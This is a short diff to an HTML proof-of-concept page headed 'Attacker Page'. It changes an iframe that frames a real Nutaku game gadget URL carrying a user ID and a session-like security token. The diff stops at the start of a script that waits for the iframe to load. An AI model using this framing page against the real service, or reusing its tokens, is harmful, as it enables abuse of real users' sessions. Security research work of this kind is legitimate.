--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=doCs%2FD9Gti7ZRtiavsCyEO9buzKLsw2mU5ok6grJT%2BDT67OVNKVxdbXB6HRUQv1OIa6TgHLAcx%2FJDaOPYc2fzgIIdFqSyyQL%2B3L%2BC2wDABbxUpYMwgjpCOHuv0RnL3No49QzVrcza4fKzsPBPMsCoIluno9KpqV%2FMJoUgjNViaNAkyKQdp1aHwKfZbhEKHJNAyupl443QPtHdLzIvG5%2FZ1XBIFMGD%2ByXoJLGHe8UfYy8H90SZjHds2nFb8fzEiX2eD3xNwsaT%2FSehbi2wQB5CagOlR4%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=Pz1Rz1Gjw8BXRPb4ZCEenlejk%2Fzwghzj0UqRXH9qBKVHgxSv90PANmoprCz9jT5LW5XTdUDARpFk04hZsXoGH205X5luVeoP6rJ3WesZSVdlwRUpfd3UGsBDrwany7%2FRetKtdzveOMkTAU3j4OdI5fFswBzPtCeTGmMGLhOvYt0WD%2FGxsMr8i%2BItzGdxHiKeyoaz%2Ba%2F2Nkt0H2gPlph%2FW3OpoFOj2hVuguYm4hluFCbabD1xSIqhOT%2BJ51uNxF2YJiJv%2B9lAJWT8rr3PT6I%2FDhAPsBU%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
